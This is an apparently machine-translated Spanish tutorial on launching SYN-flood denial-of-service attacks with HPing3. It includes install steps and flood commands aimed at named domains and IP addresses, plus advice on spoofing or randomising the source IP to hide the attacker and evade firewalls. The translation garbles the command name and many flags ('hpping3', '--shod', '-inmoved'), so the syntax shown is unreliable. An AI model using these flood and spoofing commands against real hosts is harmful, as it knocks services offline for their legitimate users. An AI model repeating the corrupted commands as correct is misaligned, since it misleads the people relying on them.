Dos inundación con HPing3

Dos inundación con HPing3
Este tutorial explica cómo ejecutar ataques de DDoS (denegación de servicio distribuida) utilizando la herramienta HPing3.

Después de leer este artículo, podrá instalar HPing3 para ejecutar pruebas DOS y DDOS. Excepto por el proceso de instalación basado en Debian, el resto de este documento es válido para todas las distribuciones de Linux.

En caso de que no esté familiarizado con los ataques DOS y DDoS, es posible que desee comenzar leyendo una introducción de DOS y DDOS.

Todos los pasos descritos a continuación incluyen capturas de pantalla para facilitar que cada usuario de Linux los siga.

Acerca de HPing3

La herramienta HPing3 le permite enviar paquetes manipulados, incluidos el tamaño, la cantidad y la fragmentación de los paquetes para sobrecargar el objetivo y la derivación o atacar los firewalls. HPing3 puede ser útil para fines de seguridad o prueba de capacidad. Al usarlo, puede probar la efectividad de los firewalls y si un servidor puede manejar una gran cantidad de conexiones. A continuación encontrará instrucciones sobre cómo usar HPing3 para fines de prueba de seguridad.

Comenzando con HPing3

Para instalar HPing3 en Debian y sus distribuciones de Linux, incluidas Ubuntu, use el Administrador de paquetes APT como se muestra en la captura de pantalla a continuación.

Sudo Apt Install Hping3 -y

En las distribuciones de Linux basadas en CentOS o Redhat, puede instalar HPing3 usando YUM como se muestra a continuación.

sudo yum -y install hpping3

Un ataque simple de DOS (no DDOS) sería:

sudo hpping3 -s --shod -v -p 80 170.155.9.185

Dónde:

  • sudo: Da los privilegios necesarios para ejecutar HPing3.
  • HPing3: Llama al programa HPing3.
  • -S: especifica los paquetes de syn.
  • -inundación: Las respuestas serán ignoradas y los paquetes se enviarán lo más rápido posible.
  • -V: Verbosidad.
  • -P 80: puerto 80, puede reemplazar este número por el servicio que desea atacar.
  • 170.155.9.185: IP objetivo.

Tenga en cuenta que la salida no muestra respuestas porque fueron ignoradas.

Inundación usando paquetes SYN contra el puerto 80

Los paquetes SYN incluyen la solicitud de confirmación de sincronización de conexión.

El siguiente ejemplo muestra un ataque SYN contra Lacampora.org:

sudo hpping3 lacampora.org -q -n -d 120 -s -p 80 -inmoved

Dónde:

  • lacampora.organizar: ¿El objetivo es, esta vez, definido con un nombre de dominio?.
  • -Q: salida breve
  • -norte: Muestra Target IP en lugar de host.
  • -D 120: establece el tamaño del paquete
  • -fuente de rand: Hides Dirección IP.

El siguiente ejemplo muestra otra posible prueba de inundación SYN para el puerto 80.

sudo hpping3--rand-fuente Ivan.com -s -q -p 80 -eschow

Inundación de una dirección IP falsa con HPing3

Con HPing3 también puedes atacar a tus objetivos con una IP falsa. Para evitar un firewall, incluso puede clonar su IP objetivo en sí, o cualquier dirección permitida que pueda conocer (puede lograrlo, por ejemplo, con NMAP o un sniffer para escuchar conexiones establecidas).

La sintaxis es la siguiente:

sudo hpping3 -a -S -q -p 80

En el ejemplo a continuación, reemplacé mi dirección IP real con la IP 190.0.174.10.

sudo hpping3 -a 190.0.174.10 190.0.175.100 -s -q -p 80

Ataques de DOS y DDoS

Un ataque de denegación de servicio (DOS) es una técnica muy simple para negar la accesibilidad a los servicios (por eso se llama un ataque de "negación de servicio"). Este ataque consiste en sobrecargar el objetivo con paquetes de gran tamaño, o una gran cantidad de ellos.

Si bien este ataque es muy fácil de ejecutar, no compromete la información o la privacidad del objetivo. No es un ataque penetrante y solo tiene como objetivo evitar el acceso al objetivo.

Al enviar una cantidad de paquetes, el objetivo no puede manejar a los atacantes evitando que el servidor sirva a usuarios legítimos.

Los ataques DOS se llevan a cabo desde un solo dispositivo; Por lo tanto, es fácil detenerlos bloqueando al atacante IP. Sin embargo, el atacante puede cambiar e incluso falsificar (clon) la dirección IP de destino. Pero no es difícil para los firewalls lidiar con tales ataques, al contrario de lo que sucede con los ataques DDoS.

Un ataque de denegación de servicio distribuido (DDoS) es similar a un ataque de DOS, pero se lleva a cabo de diferentes nodos (o diferentes atacantes) simultáneamente. Los ataques DDoS se llevan a cabo por botnets. Las botnets son scripts o programas automatizados que infectan computadoras para llevar a cabo una tarea automatizada (en este caso, un ataque DDoS). Un hacker puede crear una botnet e infectar muchas computadoras a partir de las cuales Botnets lanzará ataques de DOS. El hecho de que muchas botnets están disparando simultáneamente convierte el ataque de DOS en un ataque DDoS (por eso se llama "distribuido").

Por supuesto, hay excepciones en las que los atacantes humanos realizados por los ataques DDoS llevaron a cabo. Por ejemplo, el Grupo Hackers Anónimo, integrado por miles de personas en todo el mundo, utilizó esta técnica con mucha frecuencia debido a su fácil implementación (solo requería voluntarios que compartieron su causa). Así es como anónimo dejó el gobierno libio de Gadafi completamente desconectado durante la invasión. El estado libio quedó indefenso antes de miles de atacantes de todo el mundo.

Este tipo de ataques, cuando se realiza desde muchos nodos diferentes, es extremadamente difícil de prevenir y detenerse. Normalmente requiere hardware especial para tratar. Esto se debe a que los firewalls y las aplicaciones defensivas no están preparadas para lidiar con miles de atacantes simultáneamente. Este no es el caso de HPing3. La mayoría de los ataques realizados a través de esta herramienta estarán bloqueados por dispositivos o software defensivos, pero es útil en redes locales o contra objetivos mal protegidos.

Ahora puede comenzar a lanzar ataques de prueba DOS y DDOS con HPing3.

Conclusión

Como puede ver, ejecutar ataques de inundación de DOS es bastante simple. La simplicidad de estos ataques es un ejemplo formidable del peligro que los usuarios de Internet y especialmente los usuarios corporativos están expuestos (este tipo de ataques no es habitual contra los usuarios nacionales).

En algunos casos, los ataques DDoS pueden ser fatales para las empresas y extremadamente difíciles de detener.

Algunos dispositivos de hardware tienen mecanismos para tratar con DDO, pero las técnicas de ataque mejoran, especialmente cuando muchos atacantes están involucrados. Tenga en cuenta que también su propia conexión puede sobrecargarse ejecutando los comandos descritos en este artículo.